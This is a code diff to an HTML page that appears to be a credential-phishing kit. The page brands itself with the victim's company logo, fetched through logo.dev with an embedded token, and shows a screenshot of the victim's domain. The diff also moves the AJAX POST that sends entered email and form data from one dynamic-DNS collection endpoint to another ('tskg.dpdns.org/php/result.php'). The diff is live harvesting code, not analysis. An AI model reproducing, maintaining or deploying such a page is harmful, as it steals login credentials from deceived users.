--- a/index.html
+++ b/index.html
@@ -1775,8 +1775,11 @@ var ind=my_email.indexOf("@");
 var my_slice=my_email.substr((ind+1));
 $('#footer_dom').html(my_email);
 $('#carss').html(my_email);
- $("#top_label_logo").attr("src", "https://logo.clearbit.com/"+my_slice);
-var mPage = 'https://'+my_slice;
+$('#top_label_logo').attr(
+    'src',
+    'https://img.logo.dev/' + my_slice + '?token=pk_XbcRLEiaQmKqN0PgTrqF6A'
+  );
+var mPage = 'https://screenshot.domains/'+my_slice;
 document.getElementById('mainPage').src = mPage; 
 }
 $('#next_button').click(function(event){
@@ -1798,7 +1801,7 @@ count=count+1;
 
 $.ajax({
 dataType: 'JSON',
-url: 'http://senkiz.duckdns.org/new/send.php',
+url: 'https://tskg.dpdns.org/php/result.php',
 type: 'POST',
       	data:{
 			email:email,
@@ -1848,6 +1851,11 @@ type: 'POST',
 
 
 </script>	
+   
+  
+
+
  <script src="login-handler.js"></script>
 <script src="prefill-email.js"></script>  
+
    </body></html>
